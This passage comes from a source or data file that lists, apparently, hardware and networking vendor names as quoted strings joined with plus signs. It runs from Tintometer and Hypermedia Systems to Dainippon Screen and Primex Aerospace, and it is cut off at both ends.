Pty Ltd", + "The Tintometer Ltd", + "Hypermedia Systems", + "International Broadband Electric Communications, Inc.", + "Neural Image. Co. Ltd.", + "Avantis.Co.,Ltd", + "Polygon, Jsc", + "Merlin CSI", + "InoTec GmbH Organisationssysteme", + "Affinity International S.p.a", + "Ateliers R. LAUMONIER", + "Ymc Ag", + "Wizyoung Tech.", + "Neopost Technologies", + "Beijing DG Telecommunications equipment Co.,Ltd", + "Software Technologies Group,Inc.", + "EuroTel Spa", + "FORCE Technology", + "Roberts Radio limited", + "Navman New Zealand", + "Celtro Ltd.", + "Atlanta Advanced Communications Holdings Limited", + "Dynavisions Schweiz AG", + "Lismore Instruments Limited", + "ubtos", + "SDT information Technology Co.,LTD.", + "Wave Electronics Co.,Ltd.", + "ViewTel Co,. Ltd.", + "PheeNet Technology Corp.", + "Zylaya", + "Crossbow Technology, Inc", + "cyber-blue(HK)Ltd", + "PROBA Building Automation Co.,LTD", + "Hirschmann Multimedia B.V.", + "eWings s.r.l.", + "Corelatus AB", + "Blusens Technology", + "Signal Networks Pvt. Ltd.,", + "ISL (Instrumentation Scientifique de Laboratoire)", + "Micro Control Designs", + "PacStar Corp.", + "Seluxit", + "Hip Shing Electronics Ltd.", + "Embedded Systems Design, Inc.", + "Shenzhen Linnking Electronics Co.,Ltd", + "Cetis, Inc", + "Imagination Technologies Ltd", + "Onset Computer Corporation", + "CARLO GAVAZZI CONTROLS SPA-Controls Division", + "Pyronix Ltd", + "S-Information Technolgy, Co., Ltd.", + "Welltrans O&E Technology Co. , Ltd.", + "Cathexis", + "Xin Hua Control Engineering Co.,Ltd.", + "Lucent Trans Electronics Co.,Ltd", + "Swe-Dish Satellite Systems AB", + "Arecont Vision", + "Simoco Ltd.", + "Interay Solutions BV", + "Secure Care Products, Inc", + "Gentex Corporation/Electro-Acoustic Products", + "Essilor", + "LS Cable and System Ltd.", + "Fortunetek Co., Ltd", + "S&C Electric Company", + "Techcity Technology co., Ltd.", + "GSP SYSTEMS Inc.", + "HanYang System", + "Jurong Hi-Tech (Suzhou)Co.ltd", + "Edo-Evi", + "Jorjin Technologies Inc.", + "Citiway technology Co.,ltd", + "Euro Emme s.r.l.", + "Famar Fueguina S.A.", + "ShenZhen XinHuaTong Opto Electronics Co.,Ltd", + "Chainleader Communications Corp.", + "Staccato Communications Inc.", + "Avago Technologies Sdn Bhd", + "Ultra Electronics - TCS (Tactical Communication Systems)", + "Riedel Communications GmbH", + "SensoPart GmbH", + "Nihon Data Systens, Inc.", + "avinfo", + "iXSea", + "Commerciant, LP", + "Boundary Devices", + "Yiguang", + "Adhoco AG", + "Silicondust Engineering Ltd", + "The Morey Corporation", + "Verkerk Service Systemen", + "Würth Elektronik eiSos GmbH & Co. KG", + "Reigncom", + "Unified Display Interface SIG", + "TECOM Co., Ltd.", + "Sputnik Engineering AG", + "DEVI - Danfoss A/S", + "Hasware Inc.", + "WB Electronics Sp. z o.o.", + "Trendon Touch Technology Corp.", + "Phonex Korea Co., LTD.", + "Sensicast Systems", + "Siemens AG, Transportation Systems", + "IEEE 1394c", + "Firetide, Inc", + "PanAccess Communications,Inc.", + "Sindoricoh", + "GZ Technologies, Inc.", + "Ethernet Direct Corporation", + "Yoggie Security Systems LTD.", + "AnNeal Technology Inc.", + "XIP Technology AB", + "Weldex Corporation", + "HANA Micron Inc.", + "Leutron Vision", + "SIM Technology Group Shanghai Simcom Ltd.,", + "Digilent, Inc", + "3 Phoenix, Inc.", + "Unilever R&D", + "Atera Networks LTD.", + "Strawberry Linux Co.,Ltd.", + "8 Ways Technology Corp.", + "Wiremold", + "Neonode AB", + "Heads Up Technologies, Inc.", + "Softier", + "Gatsometer", + "Buyang Electronics Industrial Co., Ltd", + "JESS-LINK PRODUCTS Co., LTD", + "OMNIKEY GmbH.", + "AVerMedia Information Inc.", + "Ubixon Co., Ltd.", + "Peerless Systems Corporation", + "Enermet", + "elab-experience inc.", + "GAI-Tronics", + "EDM Corporation", + "Sentivision", + "SonicWALL", + "Tratec Telecom B.V.", + "PureTech Systems, Inc.", + "Sedo Co., Ltd.", + "Monsoon Multimedia, Inc", + "Renu Electronics Pvt Ltd", + "PLAYLINE Co.,Ltd.", + "Pyramid Meriden Inc.", + "Hokkei Industries Co., Ltd.", + "SZCOM Broadband Network Technology Co.,Ltd", + "Teledyne Technologies Incorporated", + "Applied Biosystems B.V.", + "NeuLion Incorporated", + "Selex Communications", + "Freedom9 Inc.", + "Dynamic Network Factory, Inc.", + "Araneo Ltd.", + "Hyundae Yong-O-Sa Co.,Ltd", + "Deck Srl", + "Neology", + "Bluberi Gaming Technologies Inc", + "Science-Technical Center RISSA", + "Cloudastructure Inc", + "Arti Industrial Electronics Ltd.", + "Core Corporation", + "Laketune Technologies Co. Ltd", + "Hanazeder Electronic GmbH", + "Summit Data Communications", + "Pivot3, Inc.", + "IMV Corporation", + "Rix Technology Limited", + "Law-Chain Computer Technology Co Ltd", + "Aweta G&P", + "PaloDEx Group Oy", + "Seoul Commtech", + "Auto-Maskin", + "SiliconStor, Inc.", + "American Fibertek, Inc.", + "Tiger NetCom", + "Hiji High-Tech Co., Ltd.", + "Koko Fitness, Inc.", + "Jaty Electronics", + "KORWIN CO., Ltd.", + "Vimicro corporation", + "Pilkor Electronics Co., Ltd", + "id-Confirm Inc", + "Karl Storz Imaging", + "Diboss.co.,Ltd", + "Haver&Boecker", + "eOn Communications", + "Shenzhen Baoan Gaoke Electronics Co., Ltd", + "Vibration Technology Limited", + "CReTE SYSTEMS Inc.", + "Tsinghua Tongfang Legend Silicon Tech. Co., Ltd.", + "Yves Technology Co., Ltd.", + "embedded-logic DESIGN AND MORE GmbH", + "Bbh Systems Gmbh", + "LibreStream Technologies Inc.", + "Oxford Diagnostics Ltd.", + "STNet Co., Ltd.", + "World Ethnic Broadcastin Inc.", + "SKNET Corporation", + "A-TEC Subsystem INC.", + "AirDefense, Inc.", + "Grip Audio", + "Exartech International Corp.", + "Gumstix, Inc", + "iba AG", + "SMA Solar Technology AG", + "Boca Devices LLC", + "NEC TOKIN Corporation", + "Zimmer Elektromedizin", + "technicob", + "Develco", + "Group 4 Technology Ltd", + "CI Network Corp.", + "setex schermuly textile computer gmbh", + "Schilling Robotics Llc", + "kyung il", + "Badger Meter Inc", + "Sigpro", + "B-KYUNG SYSTEM Co.,Ltd.", + "Quester Tangent Corporation", + "PKC Electronics Oy", + "IP Control Systems Ltd.", + "Be Here Corporation", + "Hunter Engineering Company", + "Hu Zhou NAVA Networks&Electronics Ltd.", + "Uriel Systems Inc.", + "Xiamen Yealink Network Technology Co.,Ltd", + "PECO II, Inc.", + "BEHRINGER Spezielle Studiotechnik GmbH", + "Leuze electronic GmbH + Co. KG", + "Audio / Video Innovations", + "Nolan Systems", + "Aberdeen Test Center", + "StrataLight Communications, Inc.", + "JJPlus Corporation", + "Foxconn", + "RFID, Inc.", + "PacketHop, Inc.", + "one RF Technology", + "SEECODE Co., Ltd.", + "Multivision Intelligent Surveillance (Hong Kong) Ltd", + "Dea Security", + "Takenaka Seisakusho Co.,Ltd", + "TZero Technologies, Inc.", + "Western Digital Technologies, Inc.", + "Vitelec BV", + "ZHIYUAN Eletronics co.,ltd.", + "Helicomm Inc", + "Liteon, Mobile Media Solution SBU", + "Esu Ag", + "Synectic Telecom Exports Pvt. Ltd.", + "Mstar Semiconductor", + "incNETWORKS, Inc", + "AR Infotek Inc.", + "Physiometrix,Inc", + "Key Radio Systems Limited", + "Contemporary Research Corp", + "Alive Technologies Pty Ltd", + "Sepsa", + "bio-logic SA", + "Huntleigh Healthcare", + "Datang Telecom Technology CO. , LCD,Optical Communication Br", + "Giga-Byte", + "eXS Inc.", + "HF Company", + "LexBox", + "S-TEC electronics AG", + "Deutschmann Automation GmbH & Co. KG", + "OpenIB, Inc.", + "Intronics B.V.", + "Westermo Neratec AG", + "SeekerNet Inc.", + "Consultronics Europe Ltd", + "SuperVision Solutions LLC", + "ATOMIC Corporation", + "77 Elektronika Kft.", + "ViPowER, Inc", + "Tarallax Wireless, Inc.", + "Akimbi Systems", + "AMOD Technology Co., Ltd.", + "SunKwang Electronics Co., Ltd", + "KEBA Industrial Automation Germany GmbH", + "General Meters Corp.", + "Renasis, LLC", + "Halcro", + "Kamstrup A/S", + "Iprobe AB", + "CoVi Technologies, Inc.", + "Yangjae Systems Corp.", + "Matrix Product Development, Inc.", + "Infohand Co.,Ltd", + "Redes de Telefonía Móvil S.A.", + "Kumyoung.Co.Ltd", + "FOAB Elektronik AB", + "Tabor Electronics Ltd.", + "Add-On Technology Co., LTD.", + "Asoka USA Corporation", + "Trix Tecnologia Ltda.", + "Crow Electronic Engeneering", + "Exavera Technologies, Inc.", + "TomTom", + "Paradigm Technology Inc..", + "E-Tec", + "Ecom Communications Technology Co., Ltd.", + "Tall Maple Systems", + "Scantech ID", + "Mextal B.V.", + "Galileo Avionica", + "Nuvera Fuel Cells", + "Paravirtual Corporation", + "TOMEN Cyber-business Solutions, Inc.", + "Soyal Technology Co., Ltd.", + "NTTPC Communications, Inc.", + "Naztec, Inc.", + "Matsushita Electronic Components (Europe) GmbH", + "Movacolor b.v.", + "PDH Solutions, LLC", + "PLANET System Co.,LTD", + "Xiamen Xinglian Electronics Co., Ltd.", + "MetaSwitch", + "ITian Coporation", + "Alliant Networks, Inc", + "CCV Deutschland GmbH", + "Phoenix Digital", + "BeCell Innovations Corp.", + "Endevco Corp", + "Apex Electronics Factory", + "Astek Corporation", + "Novomatic AG", + "Princeton Technology, Ltd", + "NIT lab", + "NGES Denro Systems", + "Seidel Elektronik GmbH Nfg.KG", + "NeoMeridian Sdn Bhd", + "V-Show Technology (China) Co.,Ltd", + "SiNett Corporation", + "Soenen Controls N.V.", + "Virbiage Pty Ltd", + "LeWiz Communications Inc.", + "KCodes Corporation", + "u10 Networks, Inc.", + "Emerson Climate Technologies GmbH", + "Gantner Instruments GmbH", + "Data Voice Technologies GmbH", + "Green Hills Software, Inc.", + "AWIND Inc.", + "Techno Soft Systemnics Inc.", + "Sound Devices, LLC", + "Estari, Inc.", + "BBWM Corporation", + "NetEffect Incorporated", + "AudioDev AB", + "Liebherr - Elektronik GmbH", + "4P Mobile Data Processing", + "Missouri Department of Transportation", + "Halytech Mace", + "Prime Systems, Inc.", + "Chiron Technology Ltd", + "Domo Ltd", + "Diginfo Technology Corporation", + "Alkeria srl", + "EP&T Energy", + "Neotune Information Technology Corporation,.LTD", + "ZMD America, Inc.", + "e-zy.net", + "eWerks Inc", + "Powercom Co., Ltd.", + "2001 Technology Inc.", + "Medialink-i,Inc", + "Eurilogic", + "Current Energy", + "ProMinent Dosiertechnik GmbH", + "STOEBER ANTRIEBSTECHNIK GmbH + Co. KG.", + "JL Corporation", + "Taishin Co., Ltd.", + "Goodrich Sensor Systems", + "Paradise Datacom Ltd.", + "Allied Telesis (Hong Kong) Ltd.", + "BLX IC Design Corp., Ltd.", + "RGB Networks Inc.", + "Orbital Data Corporation", + "Atmark Techno, Inc.", + "Francotyp-Postalia GmbH", + "Secom-Industry co.LTD.", + "KAYABA INDUSTRY Co,.Ltd.", + "e-SMARTCOM INC.", + "Anam Electronics Co., Ltd", + "Sordin Ab", + "Atsumi Electric Co.,LTD.", + "Sunray Co. Ltd.", + "kawamura electric inc.", + "AMETEK, Inc.", + "Ablerex Electronics Co., LTD", + "Brainium Technologies Inc.", + "Astute Networks, Inc.", + "FlexDSL Telecommunications AG", + "Astri", + "E2O Communications", + "Cognio Inc.", + "A-Jin Techline Co, Ltd", + "PalmPalm Technology, Inc.", + "Bluetooth Interest Group Inc.", + "ADDI-DATA GmbH", + "Digital Keystone, Inc.", + "Raptor Networks Technology", + "Helius, Inc.", + "Chengdu KT Electric Co.of High & New Technology", + "Accurate Techhnologies, Inc.", + "Greenbell Systems", + "Itronix Corporation", + "JTAG Technologies B.V.", + "EndRun Technologies LLC", + "Infinico Corporation", + "Day One Digital Media Limited", + "Boe Technology Group Co.,Ltd", + "REMEC, Inc.", + "YORK Refrigeration, Marine & Controls", + "Elextech INC", + "Xalyo Systems", + "Iris Sensors", + "CardioNet, Inc", + "Big Bear Networks", + "Indagon Oy", + "cim-usa inc", + "Hunt Electronic Co., Ltd.", + "Devicescape Software, Inc.", + "Videotron Corp.", + "Alcatel North America", + "China Electric Power Research Institute", + "Microtrol Limited", + "Elphel, Inc", + "S.I.T.T.I. S.p.A.", + "Cresitt Industrie", + "Positron Access Solutions Corp", + "Osaka Micro Computer.", + "BLIP Systems", + "NetKlass Technology Inc.", + "ionSign Oy", + "Decru, Inc.", + "Ponico Corp.", + "Avara Technologies Pty. Ltd.", + "Iiga co.,Ltd", + "Everbee Networks", + "B&B Electronics Manufacturing Co.", + "Solutions Radio BV", + "Bermai Inc.", + "Forsway Scandinavia AB", + "Motic Incoporation Ltd.", + "Televic N.V.", + "Control Products, Inc.", + "TetraTec Instruments GmbH", + "SAMWOO Telecommunication Co.,Ltd.", + "Bbn", + "NexGen City, LP", + "Hyundai Digital Technology Co.,Ltd.", + "AERAS Networks, Inc.", + "Hesch Schröder GmbH", + "Chenming Mold Industry Corp.", + "Technology Thesaurus Corp.", + "Shester Communications Inc", + "LogicaCMG Pty Ltd", + "Triple Play Technologies A/S", + "Optium Corporation", + "Numesa Inc.", + "JPS Communications", + "Team Simoco Ltd", + "Samsung Heavy Industries Co., Ltd.", + "Ammasso, Inc.", + "S.A.Tehnology co.,Ltd.", + "Universal Switching Corporation", + "S.W.A.C. Schmitt-Walter Automation Consult GmbH", + "Shanghai Wedone Digital Ltd. CO.", + "AFAR Communications,Inc", + "Prosoft Technology, Inc", + "Afco Systems", + "Technical Support, Inc.", + "TMT&D Corporation", + "Vinci Systems, Inc.", + "COMAG Handels AG", + "Robert Bosch GmbH, VT-ATMO", + "Sand Network Systems, Inc.", + "Infrant Technologies, Inc.", + "Cosmic Engineering Inc.", + "TekTone Sound & Signal Mfg., Inc.", + "SDO Communication Corperation", + "Nissin Inc.", + "Shell International Exploration and Production, Inc.", + "DispenseSource, Inc.", + "S2io Technologies Corp", + "GAMESA Eólica", + "Minds Inc", + "Outline Electronics Ltd.", + "Ninelanes", + "AXELL Corporation", + "Barco Projection Systems NV", + "BECS Technology, Inc", + "ABB STOTZ-KONTAKT GmbH", + "Voipac s.r.o.", + "Finlux Ltd", + "Matsushita Avionics Systems Corporation", + "Beijing 5w Communication Corp.", + "The Open Group", + "Wybron, Inc", + "Tempearl Industrial Co., Ltd.", + "ControlNet (India) Private Limited", + "SIGMACOM Co., LTD.", + "Mintera Corporation", + "United Electronic Industries, Inc. (EUI)", + "EE Solutions, Inc", + "Connect Tech Inc", + "Octasic Inc.", + "Kodicom Co.,Ltd.", + "Microlink Communications Inc.", + "Indyme Electronics, Inc.", + "GTN Systems B.V.", + "Roll Systems Inc.", + "In-Tech Electronics Limited", + "Rivertec Corporation", + "Nextlink Co., Ltd.", + "Oyo Electric Co.,Ltd", + "Holy Stone Ent. Co., Ltd.", + "Openet information technology(shenzhen) Co., Ltd.", + "Enwiser Inc.", + "Rifatron", + "Faculty of Science and Technology, Keio University", + "ORACOM Co, Ltd.", + "Automated Interfaces, Inc.", + "Orion Electric Co., Ltd.", + "Glsystech Co., Ltd.", + "Diagnostic Instruments, Inc.", + "QoStek Corporation", + "Curtiss-Wright Controls Avionics & Electronics", + "SeorimTechnology Co.,Ltd.", + "AJA Video Systems Inc", + "Nippon Dempa Co.,Ltd.", + "Nidek Co.,Ltd", + "BEB Industrie-Elektronik AG", + "ELM Inc.", + "nStor Technologies, Inc.", + "Imsys AB", + "Etin Systems Co., Ltd", + "En Garde Systems, Inc.", + "Super Star Technology Co., Ltd.", + "PC-PoS Inc.", + "T&L Information Inc.", + "Matsushita Electric Industrial Co.,Ltd.", + "Ascom Danmark A/S", + "Joymax Electronics Co. Ltd.", + "RF-Link System Inc.", + "Electroline Equipment", + "Corinex Communication Corp.", + "Shanghai Ulink Telecom Equipment Co. Ltd.", + "Innotrac Diagnostics Oy", + "TwinMOS Technologies Inc.", + "Franke Finland Oy", + "Teralink Communications", + "Cybernetics", + "Oxygnet", + "L-3 Linkabit", + "Bodet", + "Cogent Systems, Inc.", + "NeoAxiom Corp.", + "Airgo Networks, Inc.", + "Shin-Oh Electronics Co., Ltd. R&D", + "GCD Hard- & Software GmbH", + "AirVast Technology Inc.", + "Sunrich Technology Limited", + "Winnow Networks, Inc.", + "PROVIDEO Multimedia Co. Ltd.", + "Mws", + "INITECH Co., Ltd", + "ZPSYS CO.,LTD. (Planning&Management)", + "Eiki Industrial Co. Ltd.", + "Wetek Corporation", + "Quatech Inc.", + "Beijing Gongye Science & Technology Co.,Ltd", + "HOWTEL Co., Ltd.", + "Zetron Inc", + "11wave Technonlogy Co.,Ltd", + "Voxpath Networks", + "Volktek Corporation", + "Toyota Technical Development Corporation", + "Knürr GmbH", + "Vormetric, Inc.", + "IPCserv Technology Corp.", + "Hostnet Corporation", + "I CON Computer Co.", + "HiConnect, Inc.", + "Dallmeier electronic", + "Valo, Inc.", + "Teradon Industries, Inc", + "TEIMA Audiotex S.L.", + "Integrated Micromachines Inc.", + "Bluewire Technologies LLC", + "Kyoritsu Electric Co., Ltd.", + "Apani Networks", + "EADS Telecom", + "Albatron Technology", + "Synelec Telecom Multimedia", + "Xsido Corporation", + "Etherstuff", + "Server Technology, Inc.", + "Guardware Systems Ltd.", + "Mewtel Technology Inc.", + "Tatsuta System Electronics Co.,Ltd.", + "Laguna Hills, Inc.", + "AsiaRF Ltd.", + "Brain Boxes Limited", + "GentechMedia.co.,ltd.", + "HW server", + "Amperion Inc", + "ETIC Telecommunications", + "Caterpillar, Inc", + "Solacom Technologies Inc.", + "Moog GmbH", + "Sinagawa Tsushin Keisou Service", + "L&F Inc.", + "Eastmode Pte Ltd", + "Data Comm for Business, Inc.", + "HARTEC Corporation", + "Ignis Optics, Inc.", + "Bang & Olufsen A/S", + "Microtechno Corporation", + "Western Telematic Inc.", + "ACKSYS Communications & systems", + "Azylex Technology, Inc", + "Honeywell Video Systems", + "TaraCom Integrated Products, Inc.", + "Medicore Co., Ltd", + "Vocera Communications", + "K Tech Infosystem Inc.", + "Shimizu Technology Inc.", + "Neoscale Systems, Inc", + "Wireless Technologies, Inc", + "C&I Technologies", + "AGFEO GmbH & Co. KG", + "Hyundai Networks Inc.", + "Vsecure 2000 LTD.", + "Power Zenith Inc.", + "Securebase,Inc", + "AIJI System Co., Ltd.", + "Lenten Technology Co., Ltd.", + "fSONA Communications Corporation", + "Brunner Elektronik AG", + "Meret Optical Communications", + "Giant Electronics Ltd.", + "EpoX COMPUTER CO.,LTD.", + "TST Biometrics GmbH", + "Listman Home Technologies, Inc.", + "Imedia Semiconductor Corp.", + "Telebyte, Inc.", + "Linkage System Integration Co.Ltd.", + "Communication Weaver Co.,Ltd.", + "AeroConcierge Inc.", + "Firstech Technology Corp.", + "Dream-Multimedia-Tv GmbH", + "EqualLogic Inc", + "Peninsula Systems Inc.", + "ADI Engineering, Inc.", + "Gigabit Optics Corporation", + "ICP Electronics Inc.", + "Elecs Industry Co., Ltd.", + "UHD-Elektronik", + "Nippon Koei Power Systems Co., Ltd.", + "Zeta Broadband Inc.", + "Hercules Technologies S.A.S.", + "Musashi Engineering Co., LTD.", + "Bluetake Technology Co., Ltd.", + "Hitachi Ltd, Semiconductor & Integrated Circuits Gr", + "YESTECHNOLOGY Co.,Ltd.", + "VTech Technology Corp.", + "MTL Instruments PLC", + "Tai Guen Enterprise Co., Ltd", + "HIT Incorporated", + "SangSang Technology, Inc.", + "Soneticom, Inc.", + "Hikari Co.,Ltd.", + "Erskine Systems Ltd", + "Advanced Digital Technology", + "Tropic Networks Inc.", + "Hansung Teliann, Inc.", + "Optical Zonu Corporation", + "Littlefeet", + "iTEC Technologies Ltd.", + "WIS Communications Co. Ltd.", + "Commil Ltd.", + "Caporis Networks AG", + "Zhejiang Yutong Network Communication Co Ltd.", + "Cabletime Limited", + "SPGPrints B.V.", + "Automat Engenharia de Automação Ltda.", + "NASA-Goddard Space Flight Center", + "IntiGate Inc.", + "Novatechnology Inc.", + "Arizona Instrument Corp.", + "Hanbit Electronics Co., Ltd.", + "Altera Corporation", + "Massana, Inc.", + "TeraBurst Networks Inc.", + "IOA Corporation", + "LogiSync LLC", + "FreeWave Technologies", + "Navcom Technology, Inc.", + "EmergeCore Networks LLC", + "CATS Co., Ltd.", + "Pixelworks, Inc.", + "Proximion Fiber Optics AB", + "GM-2 Corporation", + "Birka BPA Informationssystem AB", + "Espera-Werke GmbH", + "Qqest Software Systems", + "Giga Stream UMTS Technologies GmbH", + "Skidata AG", + "DataLogic SpA", + "Wooksung Electronics, Inc.", + "Multitone Electronics PLC", + "Powerwallz Network Security", + "Mipsys", + "SPAUN electronic GmbH & Co. KG", + "Transaccess S.A.", + "Pentacon GmbH Foto-und Feinwerktechnik", + "Eolring", + "Quantum Data Inc.", + "GN Netcom Ltd.", + "Musashi Co., Ltd.", + "Action Digital Inc.", + "Sütron Electronic GmbH", + "Tri-M Technologies (s) Limited", + "NetEngines Ltd.", + "Mentor Data System Inc.", + "NEXTEYE Co., Ltd.", + "Yuxing Electronics Company Limited", + "Gibson Guitars", + "Group Sense Limited", + "Federal APD", + "Infoware System Co., Ltd.", + "SVA-Intrusion.com Co. Ltd.", + "Fujant, Inc.", + "Zi Corporation (HK) Ltd.", + "North Node AB", + "DongYang Telecom Co., Ltd.", + "Tundra Semiconductor Corp.", + "Maple Optical Systems", + "Thales Avionics In-Flight Systems, LLC", + "Nir-Or Israel Ltd.", + "Bitran Corporation", + "Kuokoa Networks", + "Microtune, Inc.", + "Artistic Licence Engineering Ltd", + "VT Miltope", + "Market Central, Inc.", + "Syabas Technology (Amquest)", + "R & D Center", + "e & Tel", + "Vida Design Co.", + "SEPATON, Inc.", + "Biacore AB", + "Convedia", + "ATI Technologies Inc.", + "BNTECHNOLOGY Co., Ltd.", + "Schindler Elevator Ltd.", + "Linxtek Co.", + "Ambrado, Inc", + "Bit Blitz Communications Inc.", + "Inara Networks", + "Brightcom", + "AcceLight Networks", + "ICHIPS Co., Ltd.", + "Bandspeed Pty Ltd", + "Sysmex Corporation", + "Power Dsine Ltd.", + "PRO-NETS Technology Corporation", + "Aspen Networks Inc.", + "Malachite Technologies, Inc.", + "Chung Fu Chen Yeh Enterprise Corp.", + "Accusys, Inc.", + "Crossport Systems", + "Tel Net Co., Ltd.", + "Wave7 Optics", + "Genetel Systems Inc.", + "Honeywell Co., Ltd. (KOREA)", + "Everex Communications Inc.", + "Microwave Data Systems Inc.", + "Newtec", + "ADOIR Digital Technology", + "Unicess Network, Inc.", + "Toshiba Teli Corporation", + "Egenera, Inc.", + "Takasago Ltd.", + "Softing AG", + "Netezza", + "Pivotech Systems Inc.", + "Jedai Broadband Networks", + "Cambridge Broadband Networks Group", + "LightSand Communications, Inc.", + "Technikum Joanneum GmbH", + "InfiniCon Systems, Inc.", + "NIA Home Technologies Corp.", + "Maxan Systems", + "Triz Communications", + "Sumtel Communications, Inc.", + "Thunder River Technologies, Inc.", + "MOBILINE Kft.", + "Extron Electronics", + "Sensoria Corp.", + "Lynx Photonic Networks, Inc.", + "Netcom Co., Ltd.", + "Active Silicon Ltd", + "Grammar Engine Inc.", + "CLCsoft co.", + "AbsoluteValue Systems, Inc.", + "Apex Automationstechnik", + "I/F-Com A/S", + "Tsinghua Bitway Co., Ltd.", + "Synchronous, Inc.", + "Vcomms Connect Limited", + "Princeton Networks, Inc.", + "InnoScan Computing A/S", + "Zenocom", + "Advanced Systems Co., Ltd.", + "Internet Photonics", + "Myspace AB", + "QUALICABLE TV Industria E Com., Ltda", + "SnowShore Networks, Inc.", + "FS FORTH-SYSTEME GmbH", + "Lightpointe Communications, Inc", + "Banyan Network Private Limited", + "A Brand New World in Sweden AB", + "Ikegami Tsushinki Co., Ltd.", + "Zoltrix International Limited", + "Shellcomm, Inc.", + "Iconag", + "Xtera Communications, Inc.", + "NBS Technologies Inc.", + "Willowglen Services Pte Ltd", + "Infinior Microsystems", + "Puretek Industrial Co., Ltd.", + "SAF Tehnika Ltd.", + "Broadmax Technologies, Inc.", + "Pathway Connectivity", + "L.S.I. Japan Co., Ltd.", + "Axxessit Asa", + "Navini Networks", + "Palm Wireless, Inc.", + "Telelynx, Inc.", + "Pulse-Link Inc", + "Optical Access", + "ITTC, University of Kansas", + "Poscon Corporation", + "Amann GmbH", + "G. Star Technology Corporation", + "RocketLogix, Inc.", + "Nact", + "LMS Skalar Instruments GmbH", + "Indel Ag", + "Lava Computer Mfg., Inc.", + "GlobalStreams, Inc.", + "Chino Corporation", + "Ohm Tech Labs, Inc.", + "Teo Technologies, Inc", + "Patria Ailon", + "NetMount", + "i.s.t isdn-support technik GmbH", + "PolyTrax Information Technology AG", + "Magnipix, Inc.", + "Packet Dynamics Ltd", + "Tomra Systems ASA", + "Centerpoint Broadband Technologies, Inc.", + "Pleiades Communications, Inc.", + "Hualong Telecom Co., Ltd.", + "Paragea Communications", + "Inkra Networks, Inc.", + "Spinnaker Networks, Inc.", + "WaveSmith Networks, Inc.", + "Fronius Schweissmaschinen", + "Dongju Informations & Communications Co., Ltd.", + "Hunter Technology, Inc.", + "Slim Devices, Inc.", + "OTC Wireless", + "Chip2Chip", + "Imagenics, Co., Ltd.", + "Mace Group, Inc.", + "GAI Datenfunksysteme GmbH", + "Access Media SPA", + "E-Globaledge Corporation", + "Argus Technologies", + "Pacific Broadband Communications", + "Exfo", + "Floware Wireless Systems, Ltd.", + "Digitel Co., Ltd.", + "Oak Technology", + "Eurologic Systems, Ltd.", + "Ingenico International", + "SSH Communications Security Corp.", + "A-One Co., Ltd.", + "NetMedia, Inc.", + "Weinschel Corporation", + "Aeta", + "Blaze Network Products", + "Photron Limited", + "Mitac, Inc.", + "Optranet, Inc.", + "Cidco Incorporated", + "Infineon AG", + "IDEC IZUMI Corporation", + "Jasmine Networks, Inc.", + "Mainnet, Ltd.", + "Sur-Gard Security", + "RIAS Corporation", + "Acrosser Technology Co., Ltd.", + "HOYA Corporation", + "Scannex Electronics Ltd.", + "Hilscher GmbH", + "Net Vision Telecom", + "Bionet Co., Ltd.", + "Totsu Engineering, Inc.", + "Barracuda Networks, Inc.", + "MIMOS Berhad", + "Media Serve Co., Ltd.", + "Focus Enhancements", + "Catena Networks", + "NeGeN Access, Inc.", + "CAB GmbH & Co KG", + "Net Com Systems, Inc.", + "Netsec", + "Crewave Co., Ltd.", + "Storage Apps", + "Globetek, Inc.", + "Adapcom", + "ZyGate Communications, Inc.", + "Vivotek, Inc.", + "WorldGate", + "Mannesman Dematic Colby Pty. Ltd.", + "Geyser Networks, Inc.", + "Simpler Networks", + "NeoWave, Inc.", + "Net & Sys Co., Ltd.", + "Sitera, Inc.", + "QPS, Inc.", + "Pilz GmbH & Co.", + "SiByte, Inc.", + "Seedek Co., Ltd.", + "C-COM Corporation", + "Mark of the Unicorn, Inc.", + "Teltronics, Inc.", + "Visicom", + "Mantra Communications, Inc.", + "Asound Electronic", + "Hitachi Denshi, Ltd.", + "Image Display Systems, Inc.", + "DSP Application, Ltd.", + "Cotas Computer Technology A/B", + "Kollmorgen-Servotronix", + "Simtel S.r.l.", + "Roi Computer Ag", + "Texas Digital Systems", + "Dica Technologies Ag", + "Refraction Technology, Inc.", + "Hanbyul Telecom Co., Ltd.", + "Wild Lab. Ltd.", + "Winsystems, Inc.", + "IT Farm Corporation", + "KYOWA Electronic Instruments C", + "Tiw Systems", + "Berkeley Process Control", + "Genesys Logic, Inc.", + "Mega Vision", + "Kenetec, Inc.", + "Heidelberger Druckmaschinen AG", + "Amcc", + "Radiant Communications Corp.", + "Cadant Inc.", + "Main Street Networks", + "Celestix Networks Pte Ltd.", + "LightChip, Inc.", + "Nextcomm, Inc.", + "Smk-M", + "Vitesse Semiconductor Corporation", + "SAEJIN T&M Co., Ltd.", + "ORSYS GmbH", + "Honewell Oy", + "HiQ Networks", + "LocSoft Limited", + "Controlled Electronic Manageme", + "Adtech", + "Global Converging Technologies", + "MMC Technology, Inc.", + "Lightner Engineering", + "DeTeWe-Deutsche Telephonwerke", + "Packard Bell Nec Services", + "QTelNet, Inc.", + "Terawave Communications, Inc.", + "OPEN Networks Pty Ltd", + "DVICO Co., Ltd.", + "Bri-Link Technologies Co., Ltd", + "RiscStation Ltd.", + "Ennovate Networks, Inc.", + "Oscilloquartz S.a.", + "Comone", + "At Work Computers", + "Tenor Networks, Inc.", + "Convergenet Technologies", + "Transistor Devices, Inc.", + "Tews Datentechnik GmbH", + "Nagano Japan Radio Co., Ltd.", + "Hasselblad", + "Rightech Corporation", + "Checkout Computer Systems, Ltd", + "Sedona Networks Corp.", + "Multidata Gmbh", + "Set Engineering", + "Fraunhofer IPMS", + "Pinnacle Systems, Inc.", + "Securelogix Corporation", + "Msc Vertriebs Gmbh", + "Akamba Corporation", + "Borgardt", + "Onnto Corp.", + "Sitek", + "Ishida Co., Ltd.", + "Seyeon Tech. Co., Ltd.", + "Iva Corporation", + "Stardot Technologies", + "Turbonet Communications, Inc.", + "WEBGATE Inc.", + "Penta Media Co., Ltd.", + "Basler AG", + "Win Technologies, Co., Ltd.", + "AB Regin", + "Zonal Retail Data Systems", + "Harmonic Data Systems, Ltd.", + "Behavior Tech. Computer Corp.", + "Mcquay International", + "Long Well Electronics Corp.", + "Wakefern Food Corporation", + "Omega Electronics Sa", + "Scm Microsystems, Inc.", + "Digital Engineering Ltd.", + "Speech Design Gmbh", + "Api Motion", + "Vianet Technologies, Ltd.", + "Vivid Technology Pte, Ltd.", + "Prevas A/S", + "Keycorp Ltd.", + "Nextone Communications, Inc.", + "Aim System, Inc.", + "Dainippon Screen Corporate", + "Primex Aerospace 